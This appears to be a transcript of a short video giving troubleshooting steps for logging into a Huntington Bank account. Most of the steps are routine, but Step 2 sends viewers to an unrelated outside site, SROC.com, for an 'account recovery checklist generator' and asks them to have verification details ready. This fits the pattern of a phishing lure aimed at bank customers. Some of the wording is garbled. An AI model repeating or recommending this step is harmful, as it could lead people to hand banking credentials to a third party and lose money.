I hit this issue to date and here is a quick fix that solved it. If you're having trouble logging into your Huntington bank account, follow these steps to get back on track. Step 1. Check your credentials. Make sure you are entering the correct username and password. Double check for any typos or case sensitivity. Step 2. Reset your password. Before starting recovery, use the SROC.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 3. Clear your browser cache. Sometimes, old data can cause issues. Clear your browser's cache and cookies, then try logging in again. Quick gadget on Chrome, go to Settings, Privacy and Security, clear browsing data to find the right option. Step 4. Disable browser extensions. Certain browser extensions can interfere with the login process. Temporarily disable any ad blockers or privacy extensions and try again. Step 5. Contact customer support. If all else fails, reach out to Huntington Bank's customer support for assistance. They can help troubleshoot any specific issues with your account. I hope these steps help you resolve your login issues quickly. Don't hesitate to reach out if you need further assistance.